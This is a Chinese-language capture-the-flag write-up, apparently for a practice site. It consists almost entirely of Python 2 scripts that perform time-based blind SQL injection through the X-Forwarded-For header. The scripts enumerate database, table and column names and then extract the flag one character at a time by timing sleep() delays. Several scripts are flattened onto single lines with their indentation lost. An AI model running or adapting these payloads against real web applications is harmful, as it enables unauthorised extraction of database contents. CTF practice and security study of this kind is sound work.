暴力求数据库名:
# -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.lowercase+string.uppercase+string.digits+string.punctuation database=[] for database_number in range(0,100): #假设爆破前100个库 databasename='' for i in range(1,100): #爆破字符串长度,假设不超过100长度 flag=0 for str in guess: #爆破该位置的字符 #print 'trying ',str headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)} try: res=requests.get(url,headers=headers,timeout=4) except: databasename+=str flag=1 print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename break if flag==0: break database.append(databasename) if i==1 and flag==0: print '扫描完成' break for i in range(len(database)): print database[i]
暴力求数据表数目:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
for table_number in range(0,500):
print 'trying',table_number
headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print table_number
break
暴力求表名:
# -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.lowercase+string.uppercase+string.digits+string.punctuation tables=[] for table_number in range(41,42): #假设从第60个开始 tablename='' for i in range(1,100): #爆破字符串长度,假设不超过100长度 flag=0 for str in guess: #爆破该位置的字符 headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)} try: res=requests.get(url,headers=headers,timeout=4) except: tablename+=str flag=1 print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename break if flag==0: break tables.append(tablename) if i==1 and flag==0: print '扫描完成' break for i in range(len(tables)): print tables[i]
暴力求列数目:
# -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.lowercase+string.uppercase+string.digits+string.punctuation database=[] for table_number in range(0,1000): print 'trying',table_number headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)} try: res=requests.get(url,headers=headers,timeout=4) except: print table_number break
暴力求列名:
# -*- coding:utf-8 -*-
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(482,483): #假设从第60个开始
cloumnname=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print '扫描完成'
break
for i in range(len(columns)):
print columns[i]
暴力求内容:
#-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess=string.lowercase + string.uppercase + string.digits flag="" for i in range(1,100): havetry=0 for str in guess: headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)} try: res=requests.get(url,headers=headers,timeout=6) except requests.exceptions.ReadTimeout, e: havetry=1 flag = flag + str print "flag:", flag break if havetry==0: break print 'result:' + flag
提交的话在将内容放在ctf{}中提交。